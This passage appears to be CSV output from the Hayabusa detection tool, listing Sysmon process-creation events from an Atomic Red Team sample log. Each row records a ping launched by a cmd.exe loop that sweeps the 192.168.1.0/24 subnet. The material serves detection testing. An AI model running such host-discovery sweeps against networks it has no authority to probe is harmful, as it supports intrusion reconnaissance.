192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.63 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.64 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.65 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.66 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.67 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 